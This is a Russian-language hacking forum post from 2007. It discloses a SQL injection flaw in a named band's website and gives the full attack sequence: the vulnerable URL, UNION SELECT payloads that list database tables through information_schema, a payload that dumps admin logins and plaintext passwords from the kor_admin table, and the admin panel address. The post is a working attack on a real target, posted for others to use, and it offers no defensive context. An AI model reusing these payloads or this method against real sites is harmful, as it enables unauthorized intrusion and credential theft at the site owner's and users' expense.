Показать сообщение отдельно

sql-inj
  #5  
Старый 16.05.2007, 23:45
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами: 10041506

Репутация: 572
Arrow sql-inj

Коррозия Металла

http://www.korroziametalla.com/
уязвимость: http://www.korroziametalla.com/news_arh.php?year=2007&id=49'
-> mysql 5
смотрим таблицы стандартными средствами пятой версии:
Цитата:
http://www.korroziametalla.com/news_arh.php?year=2007&id=-49+union+select+1,2,3,table_name,5+from+informatio n_schema.tables+limit+0,1/*
находим обращаем внимание на kor_forum и kor_admin. смотрим колонки аналогичным образом, потом смотрим в них и видим логин/пароль, пароль в незашифрованном виде
Цитата:
http://www.korroziametalla.com/news_arh.php?year=2007&id=-49+union+select+1,2,3,concat_ws(0x3a,id,login,pass word),5+from+kor_admin+limit+0,1/*
админка
Цитата:
http://www.korroziametalla.com/admin/

Последний раз редактировалось Серенький; 16.05.2007 в 23:47..
 
Ответить с цитированием